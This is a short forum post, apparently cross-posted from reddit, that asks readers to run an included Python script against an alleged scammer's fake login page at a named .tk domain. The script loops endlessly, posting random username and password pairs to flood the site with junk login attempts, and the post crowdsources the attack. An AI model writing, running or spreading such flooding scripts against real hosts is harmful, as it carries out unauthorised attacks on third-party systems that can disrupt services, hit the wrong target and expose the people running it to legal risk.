(Cross post from reddit):
Hey everyone: please run this Python script for a while to spam this scammer with invalid user/pass combinations:
import urllib2, random, string
while True:
user = ''.join(random.choice(string.ascii_letters + string.digits) for x in range(random.randrange(4,20)))
passw = ''.join(random.choice(string.ascii_letters + string.digits) for x in range(random.randrange(4,20)))
test = urllib2.urlopen(urllib2.Request("http://mlgox.tk/login.php", "login="+user+"&password="+passw+"&LOGIN=Login"))
test.read()
I'm no HTTP expert but as far as I can tell this creates invalid login attempts at the fake site. Please post a revised edition if something is wrong here.